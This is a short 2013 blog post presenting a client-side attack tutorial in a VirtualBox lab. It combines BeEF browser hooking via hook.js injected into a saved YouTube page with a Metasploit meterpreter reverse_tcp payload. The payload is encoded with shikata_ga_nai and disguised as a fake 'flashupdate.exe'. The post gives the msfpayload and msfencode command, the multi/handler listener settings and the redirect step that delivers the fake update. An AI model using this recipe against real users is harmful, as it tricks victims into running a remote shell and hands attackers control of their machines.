Sunday, 19 May 2013

Client side attack combination using BeEF and Metasploit

Hello again, in this post i will simulate the client side attack using Beef and metasploit. client side attack is the attack performed by the client. in this simulation i am using windows xp in virtualbox and firefox browser as a target.

Here's the gameplay :
1. attacker send the link of youtube website to the target that contain file hook.js from BeEF
2. when the target open the link, BeEf will hook the target.
3. attacker will send the fake javascript update .exe that contain payload from metasploit
3. target click the update and the system will be pwned.

And here's the steps :
- choose a video on youtube and save page as youtube.html and put in /var/www/


- run the BeEF from menu backtrack > exploitation > social engineering tools > BeEF


- modify the youtube.html and insert the hook.js 



- run the infected html file in target's browser 


- open BeEF panel in backtrack's browser, the address is 192.168.56.1:3000/ui/panel

- the target's browser is successfully hooked by BeEF


- create the fake exe file update using metasploit
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=1234 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/flashupdate.exe



- run metasploit (msfconsole) and listening on port 1234 
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.1
set LPORT 1234
exploit



- send the payload file with redirect browser command in BeEF 


- execute the file



- Voila! the system is pwned!


Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)